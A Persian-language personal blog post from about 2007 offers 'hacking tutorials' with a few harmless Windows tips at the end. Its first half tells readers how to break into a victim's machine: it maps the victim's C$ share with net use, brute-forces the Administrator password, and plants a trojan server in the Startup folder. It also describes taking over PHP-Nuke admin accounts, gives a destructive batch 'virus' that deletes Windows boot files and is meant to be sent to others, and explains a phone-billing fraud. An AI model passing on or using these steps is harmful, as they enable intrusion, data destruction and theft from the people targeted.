سفارش تبلیغ
صبا ویژن
آبرویت نریخته ماند تا خواهش آن را بچکاند ، پس بنگر که آن را نزد که مى‏ریزى . [نهج البلاغه]

اموزش +ترفند - اموزش (هرچی که بخوایی)

Powerd by: Parsiblog ® team.
اموزش +ترفند(پنج شنبه 86 آبان 3 ساعت 11:26 صبح )

اموزش هک (جدید)

با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... )
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نویسنده : فرشاد عزیز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

ویروس نویسی به زبان ساده:

یه ویروس باحال در win xp : [ویروس نویسی]

یه  Text Document  باز کنید و بعد این کامند رو توش بنویسید :

:c

del autoexec.bat

del config.sys

cd winnt

del system.ini

del win.ini

بعد فایل رو با پسوند bat  .سیو کنید.

مثل این : nofooz.bat

این فایل رو وقتی برای  کسی بفرستید هیچی نمیشه  ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .

من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .

ترفند گوشی همراه:

شما میتونید با مبایلتون هر چندتا خواستید تلفن بزنید و هزینه ها را به حساب یه نفر دیگه بزارید خیلی با حال نه؟ برای اینکار باید یه کارهایی انجام بدین به این صورت : اول مبایل اون شخصی را که می خواهید هزینه ها را بپردازد بر دارید و شماره ای را که میخواهید هزینه اش برداشته بشه را بگیرید البته قبلش یک + یا 90+ اضافه کنید مثلاْ به این صورت :091۲۱10۱۱۱۱+ که در نتیجه دیگه هزینه به صورت حساب این شماره اضافه نمیشه و همش میره به حساب کسی که شما این شماره را با مبایلش گرفتید البته این کار با دزدی فرقی نداره اما صد در صد جواب میده و خود مخابرات هم اعلام کرده که همچنان راهی برای این مشکل پیدا نکردن ! پس از امروز موبایلتون رو دست همه کس ندین این روش  هم کاملا امتحان شدهاست.
 

ترفند ویندوز:

چگونه می توان کامپیوتر را در تاریخ و زمان تعیین شده روشن کرد

 اگر بخواهید می توانید از این روش استفاده کنید :

  • 1- ابتدا باید وارد setup سیستم خود شوید.
  • 2- بعد به دنبال گزینه power management setup بگردید .
  • 3- حال گزینه PWRon/Resume by alarm را بیابید .
  • 4- گزینه فوق را از[Disabled] به [Enabled] برگردانید .
  • 5- حال گزینه date alarm فعال شده پس تاریخ خود را یادداشت کنید .
  • 6- زمان را نیز می توان با گزینه time (hh:mm:ss) alarm تنظیم کرد.

با فشردن کلید F10 و ذخیره اطلاعات آن را خاموش کنید .فقط کافی است سیستم شما به برق زده شده باشد . حال سیستم شما در تاریخ و ساعت مورد نظر روشن می شود .

 ساخت Setup برای نصب  برنامه ها در ویندوز

یکی از دغدغه های اصلی برنامه نویسان و سازندگان محصولات و برنامه های کامیپوتری ساخت Setup برای نصب و Install برنامه ساخت شده بر روی سیستم کاربران است. برای این کار برنامه های مختلف و حرفه ای ساخته شده اما هر کدام این نرم افزارها دارای پیچیدگی های خاصی هستند. در این ترفند قصد داریم به معرفی یکی از ابزارهای مخفی ویندوز XP بپردازیم که با بهره گیری از آن میتوانید یک Setup تمام و کمال بسازید. بدون اینکه نیاز به برنامه جانبی دیگری داشته باشید.
 
 بدین منظور:
 

 ابتدا از قسمت Start گزینه Run را انتخاب کنید و در آن کلمه ی Iexpress را تایپ کنید . متظر بمانید تا پنجره ی Iexpress ظاهر شود .
 روی گزینه ی Next کلیک کنید .
 گزینه Extract Files Only را انتخاب کنید و روی Next کلیک کنید .
 در اینجا یک نام برای فایل تون انتخاب کنید . قسمت بالایی . و بعد روی Next کلیک کنید .
 گزینه ی No Prompt را انتخاب کنید و روی Next کلیک کنید . توجه داشته باشید اگر در این قسمت گزینه ی Prompt User Width را انتخاب کنید سوالی در مورد ادامه نصب از کاربر پرسیده می شود ، که آیا برای نصب آماده است یا نه ؟
 گزینه پیش فرض را انتخاب کنید . و روی Next کلیک کنید .
 در اینجا فایل مورد نظر خود را اضافه کنید . مثلا فایل یک فونت یا یک عکس در اینجا می بینید که فقط می توانید یک فایل انتخاب کنید . برای انتخاب کل فایل ، فایل مورد نظر را به صورت Zip در آورید . حالا روی Next کلیک کنید .
 در اینجا نمایش می دهد که فایل شما در ویندوز چگونه نشان داده شود . گزینه پیش فرض را انتخاب کنید و روی Next کلیک کنید .
 در اینجا گزینه ی Display Message را انتخاب کنید تا بعد از نصب نشان دهد که نصب با موفقیت به اتمام رسیده است . بعد روی Next کلیک کنید .
 در اینجا با یک مسیر برای ذخیره فایل خود انتخاب کنید . روی Next کلیک کنید .
 در این جا گزینه ی Don’t Save را انتخاب کنید . و روی Next کلیک کنید .
 در اینجا روی Next کلیک کنید .
 فایل ما با موفقیت به اتمام رسیده است . روی Finish کلیک کنید .



 


» علی .م
»» نظرات دیگران ( نظر)


لیست کل یادداشت های این وبلاگ
اموزش +ترفند
اولین امزش معلم

بازدیدهای امروز: 0  بازدید
بازدیدهای دیروز: 0  بازدید
مجموع بازدیدها: 2768  بازدید
[ صفحه اصلی ]
[ وضعیت من در یاهو ]
[ پست الکترونیک ]
[ پارسی بلاگ ]
[ درباره من ]

» اشتراک در خبرنامه «
 
سفارش تبلیغ
صبا ویژن
این صفحه را خانگی صفحه ی خانگی خود کنید
بزرگترین سایت جاوا اسکریپت ایران